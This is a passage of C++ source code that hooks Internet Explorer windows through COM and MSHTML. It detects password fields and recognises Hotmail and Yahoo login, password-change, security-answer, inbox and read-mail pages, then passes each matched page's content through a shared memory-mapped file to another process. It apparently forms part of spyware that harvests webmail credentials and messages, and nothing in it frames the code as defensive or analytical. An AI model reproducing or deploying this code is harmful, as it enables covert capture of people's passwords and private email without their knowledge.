    HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_all(&pForm);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pForm->get_length(&len);
	if(FAILED(hr)) return FALSE;
	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pForm->item(CComVariant(i), CComVariant(i)); //Atlbase.h

		MSHTML::IHTMLInputElementPtr lpInput;
        HRESULT hr = lpItem->QueryInterface(&lpInput);
		if(FAILED(hr)) continue;

		_bstr_t type(_T("password")); //#include <comdef.h>
		if(lpInput->Gettype() == type)
		{
			//_bstr_t x = lpInput->Getvalue();
			//CString str = (LPTSTR)x;
			pForm->Release();
			pForm = NULL;
			return TRUE;
		}
	}
	pForm->Release();
	pForm = NULL;
	return FALSE;
}

//Some Pre defined Site such as Following
BOOL WINAPI IsPreDefBrowser(DWORD dwIndex)
{
	if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
	HRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex], WM_QUERY_BROWSER, 
		WM_WPARAM_CHECK_ISPREDEF,dwIndex);
	if(hr != 0)
		return TRUE;
	return FALSE;
}

enumPreDefinePage InterIsPreDefBrowser(DWORD dwIndex)
{
	//if(g_lpWeb2[dwIndex] == NULL)
	//	PopMsg(_T("1.  IWebBrowser2[%d] = NULL in InterIsPreDefBrowser"), dwIndex);

	if(g_lpHTMLDocument2[dwIndex] == NULL)
	{
		if(!LinkCom(dwIndex)) return none;
	}
	
	//if(g_lpWeb2[dwIndex] == NULL)
	//	PopMsg(_T("2.  IWebBrowser2[%d] = NULL in InterIsPreDefBrowser"), dwIndex);

	BSTR bstr;
	HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_url(&bstr);

	//PopMsg(_T("InterIsPreDefBrowser url got %s"), (LPCWSTR)bstr);

	//We use Unicode here
	UINT len = ::SysStringLen(bstr);
	int dim = sizeof(szTargetUrl)/sizeof(szTargetUrl[0]);
	
	enumPreDefinePage bRet = none;
	for(int i = 0; i < dim; i++)
	{
		if(::WildCompare((LPTSTR)(LPCTSTR)bstr, len, (LPCTSTR)szTargetUrl[i]) != -1)
		{
			bRet = (enumPreDefinePage)i;
			break;
		}
	}
	::SysFreeString(bstr);
	return bRet;
}

DWORD WINAPI QueryBrowserState(DWORD dwIndex)
{
	return g_dwBrowserState[dwIndex];
}

BOOL Trigger(DWORD dwIndex)
{
	::SendMessage(::g_hBrowserWnd[dwIndex], WM_TRIGGER_BROWSER, dwIndex, 0);
	return TRUE;
}

BOOL Trigger2(DWORD dwIndex)
{
	//PopMsg(_T("trigger nIndex - %d"), dwIndex);
	//Decide Detail Type of the Current Homepage and Parse its Html to MMF
    enumPreDefinePage type = InterIsPreDefBrowser(dwIndex);

	//PopMsg(_T("trigger type - %d"), type);

	if(type != none  || InterIsPwdBrowser(dwIndex))
	{
		//PopMsg(_T("MMF opening"));
		//Open MMF
		HANDLE hMMF, hWriteEvent, hReadEvent;
	    LPVOID pView = NULL;
	
	    hMMF = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE,
           FALSE, g_MMF_NAME);
        if (hMMF == NULL) 
		{
			::ReportErr(_T("Open MMF Failed in Trigger")); 
		    return FALSE;
		}
	    
	    hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_WRITE_EVENT_MMF_NAME);
	    if(hWriteEvent == NULL)
		{
			::CloseHandle(hMMF);
		    ::ReportErr(_T("Open Write Event Failed in Trigger"));
		    return FALSE;
		}
	
	    hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_READ_EVENT_MMF_NAME);
	    if(hReadEvent == NULL)
		{
			::CloseHandle(hMMF);
		    ::CloseHandle(hWriteEvent);
		    ::ReportErr(_T("Open Read Event Failed in ReadSource"));
		    return FALSE;
		}

	    DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);//INFINITE);
	    if(dwRet == WAIT_ABANDONED)
		{
			//::ReportErr(_T("Write Wait Error")); 
		    ::CloseHandle(hMMF);
		    ::CloseHandle(hWriteEvent);
		    ::CloseHandle(hReadEvent);
	        return FALSE;
		}
	    else if(dwRet == WAIT_TIMEOUT)
		{
			//::ReportErr(_T("Write Wait Time Out"));
		    ::CloseHandle(hMMF);
		    ::CloseHandle(hWriteEvent);
		    ::CloseHandle(hReadEvent);
	        return FALSE;
		}
	
	    ::ResetEvent(hWriteEvent);

	    //4 Byte Total size
	    //4 byte Used size
	    DWORD pos = 0;
	    //head 4 byte to record size
	    pView = MapViewOfFile(hMMF, 
	        FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
	    if(pView == NULL)
		{
			::ReportErr(_T("Write MapView Faield in InterQueryDocument")); 
		    ::CloseHandle(hMMF);
		    ::CloseHandle(hWriteEvent);
		    ::CloseHandle(hReadEvent);
	        return FALSE;
		}

	    LPBYTE lpByte = (LPBYTE)pView;
	    DWORD dwSize, dwUsed, dwInfo;
	    ::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
	    lpByte += sizeof(DWORD);
	    ::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
        lpByte += sizeof(DWORD);

	    LPBYTE lpMem = (LPBYTE)lpByte; //Actual Data Head
   	    //================
		switch(type)
		{
		case hotmailInbox:
			//PopMsg(_T("hotmailInbox"));
			HandleHotmailInboxPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailCompose:
			//PopMsg(_T("hotmailCompose"));
			HandleHotmailComposePage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailLogin:
			//PopMsg(_T("hotmailLogin"));
			HandleHotmailLogInPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailLogError:
			//PopMsg(_T("hotmailLogErr"));
			HandleHotmailLogErrorPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailContacts:
			//PopMsg(_T("hotmailContact"));
			HandleHotmailContactsPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
        case hotmailChangePassword:
			//PopMsg(_T("hotmailChangePassword"));
			HandleHotmailChangePasswordPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailChangeAnswer:
			//PopMsg(_T("hotmailChangeAnswer"));
			HandleHotmailChangeAnswerPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailForgotPassword:
			//PopMsg(_T("hotmailForgetPassword"));
			HandleHotmailForgotPasswordPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case hotmailReadMail:
			//PopMsg(_T("hotmailReadMail"));
			HandleHotmailReadMailPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		///////////////////////////////
		case yahooInbox:
			//PopMsg(_T("yahooInbox"));
			HandleYahooInboxPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooCompose:
			//PopMsg(_T("yahooCompose"));
			HandleYahooComposePage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooLogin:
			//PopMsg(_T("yahooLogin"));
			HandleYahooLogInPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooLogError:
			//PopMsg(_T("yahooLogErr"));
			HandleYahooLogErrorPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooContacts:
			//PopMsg(_T("yahooContact"));
			HandleYahooContactsPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
        case yahooChangePassword:
			//PopMsg(_T("yahooChangePassword"));
			HandleYahooChangePasswordPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooChangeAnswer:
			//PopMsg(_T("yahooChangeAnswer"));
			HandleYahooChangeAnswerPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooForgotPassword:
			//PopMsg(_T("yahooForgetPassword"));
			HandleYahooForgotPasswordPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		case yahooReadMail:
			//PopMsg(_T("yahooReadMail"));
			HandleYahooReadMailPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		
        default: //password page
			//PopMsg(_T("PasswordPage"));
			HandlePasswordPage(g_lpHTMLDocument2[dwIndex], lpMem, dwSize, dwUsed, dwInfo);
			break;
		}
        //PopMsg(_T("ReadPage Over"));

	    lpByte = (LPBYTE)pView;
        lpByte += sizeof(DWORD);
        ::CopyMemory(lpByte, &dwUsed, sizeof(DWORD));
    
	    ::UnmapViewOfFile(pView);
	    ::CloseHandle(hMMF);
	    ::CloseHandle(hWriteEvent);
	
	    ::SetEvent(hReadEvent);
	    ::CloseHandle(hReadEvent);
	}
	else
		return FALSE;
	return TRUE;
}